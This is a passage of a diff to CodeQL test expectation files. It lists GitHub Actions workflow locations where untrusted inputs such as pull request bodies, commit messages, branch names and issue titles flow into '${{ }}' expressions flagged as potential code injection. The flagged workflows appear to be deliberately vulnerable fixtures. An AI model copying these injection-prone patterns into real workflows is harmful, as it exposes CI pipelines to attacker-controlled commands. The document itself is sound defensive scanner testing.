.github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | -| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref index 9af8ec0f9ab1..6fc87669b07f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionCritical.ql +query: Security/CWE-094/CodeInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4bbe7da0aaf3..fc6f8aa58209 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,3 +1,62 @@ +#select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | +| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | +| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | +| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | +| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
